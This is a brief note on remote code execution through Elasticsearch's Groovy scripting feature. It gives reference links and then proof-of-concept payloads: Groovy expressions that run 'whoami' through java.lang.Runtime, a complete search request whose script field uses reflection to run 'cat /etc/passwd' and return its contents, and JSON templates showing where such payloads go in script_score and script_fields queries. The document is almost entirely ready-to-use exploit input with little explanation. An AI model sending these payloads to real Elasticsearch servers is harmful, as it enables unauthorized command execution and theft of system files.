elasticsearch scripting security issues
elasticsearch scripting:
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html
security issues:
http://www.elasticsearch.org/community/security/
POC:
Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()
super.class.toString().valueOf('whoami').execute().getText()
http://zone.wooyun.org/content/18915
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
{
"size": 1,
"query": {
"function_score": {
"script_score": {
"script": "POC............",
"lang": "groovy"
}
}
}
}
{
"size": 1,
"script_fields": {
"my_field": {
"script": "POC.........."
}
}
}